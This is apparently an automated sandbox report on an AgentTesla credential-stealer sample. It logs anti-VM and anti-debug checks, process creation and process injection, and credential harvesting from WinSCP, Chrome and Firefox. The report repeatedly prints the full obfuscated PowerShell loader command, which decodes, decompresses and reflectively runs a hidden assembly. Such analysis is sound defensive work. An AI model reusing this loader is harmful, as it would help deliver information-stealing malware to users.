Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98827
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97383
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96389
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95605
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799610

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 20_2_00AE70B0 CheckRemoteDebuggerPresent,

20_2_00AE70B0

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe c:\users\user\desktop\87m9y3p4z7.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\desktop\87m9y3p4z7.bat' \| select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)\| out-null"
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe c:\users\user\appdata\roaming\channeluris.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\appdata\roaming\channeluris.bat' \| select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)\| out-null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe c:\users\user\desktop\87m9y3p4z7.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\desktop\87m9y3p4z7.bat' \| select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)\| out-null"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe c:\users\user\appdata\roaming\channeluris.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\appdata\roaming\channeluris.bat' \| select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)\| out-null"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
